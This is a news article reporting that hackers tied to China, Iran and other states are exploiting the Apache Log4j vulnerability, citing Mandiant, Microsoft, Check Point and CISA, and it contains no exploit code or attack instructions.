Cybersecurity professionals say China, Iran, and other nations’ hackers are exploiting a vulnerability in the open-source logging platform Apache Log4J to get a foothold into networks they intend to breach in the future.
The problem has panicked the private sector and federal government alike because the affected software is widely used. Industries involving power, water, food, transportation, and manufacturing were exposed, according to industrial control cybersecurity firm Dragos.
Regardless of whether America’s hostile adversaries are responsible for the cyber breach, they are using it now, say the cyber pros. The cybersecurity firm Mandiant said it has seen China and Iran using the vulnerability, which Microsoft said it also saw along with groups from North Korea and Turkey.
<!– Temp removal of in article reco
End comment –>
Mandiant vice president of intelligence analysis John Hultquist said Wednesday that his team expects other state-sponsored hackers are preparing to join China and Iran as well.
“We believe these actors will work quickly to create footholds in desirable networks for follow-on activity which may last for some time,” said Mr. Hultquist in a statement. “In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.”
Mr. Hultquist said the Iranians observed by Mandiant are “particularly aggressive” and have taken part in ransomware operations that may be geared toward causing chaos over financial gain. Microsoft likewise said on its website that the Iranian group had deployed ransomware and the company observed the Iranians making modifications to the vulnerability.
Check Point, a cybersecurity firm headquartered in Israel and California, said Wednesday it observed the Iranian hacking group using the Log4j vulnerability to go after seven targets in Israel in the previous 24 hours.
The Chinese hackers are a familiar foe for Microsoft. Microsoft identified the Chinese hackers as Hafnium, a group that Microsoft previously claimed was responsible for the hack of its Exchange servers.
Federal authorities later said the Exchange hack compromising tens of thousands of computers were attributable to criminal contract hackers working for China’s Ministry of State Security.
Microsoft said Hafnium’s targets look to have expanded in its use of the new problems with Log4j.
“HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting,” said Microsoft on its website. “In these attacks, HAFNIUM-associated systems were observed using a [Domain Name Service] service typically associated with testing activity to fingerprint systems.”
The problems associated with the Log4j vulnerability have grown even as cybersecurity professionals are looking to defend against attacks. In a post updated on Wednesday afternoon, Check Point said it had observed more than 1.8 million attempts to exploit the Log4j vulnerability since Friday, which means almost half of the corporate networks it tracks are a target now.
The Cybersecurity and Infrastructure Security Agency has said no federal agencies were known to have been compromised thus far.
• This article includes wire service reports.